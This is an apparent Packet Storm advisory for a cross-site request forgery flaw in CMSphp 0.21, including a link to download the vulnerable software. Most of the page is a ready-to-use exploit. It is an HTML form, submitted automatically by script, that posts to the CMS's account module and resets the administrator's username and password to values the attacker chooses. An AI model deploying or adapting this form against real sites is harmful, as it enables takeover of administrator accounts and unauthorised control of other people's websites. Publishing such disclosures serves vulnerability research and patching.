CMSphp version 0.21 suffers from a cross site request forgery vulnerability.
4c5ebc8b86c347a88167c240f56e01419a42b3677e7b3669194d3dcb63bbe79cAuthor: REMOVED AT REQUEST OF AUTHOR
CMS: CMSphp 0.21
Type of vulnerability: Cross site request forgery
You can download following cms on : http://webscripts.softpedia.com/script/Content-Management/CMSphp-37567.html
CMSphp 0.21 suffers from Cross site request forgery which allows malicious attacker to change admins password
Here is exploit
*************************begin
<form action="[URL]/modules.php?name=Your_account" method="post">
<td><input type="text" name="pseudo" size="30" maxlength="25" value="[ADMIN]">
<input type="text" name="pwd" size="11" maxlength="10" value ="[PASS]">
<input type="hidden" name="op" value="admin_info_user_verif">
<input type="hidden" name="uid" value="1">
<input type="submit" value="Changer">
<script>document.forms[0].submit()</script>
***************************end
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed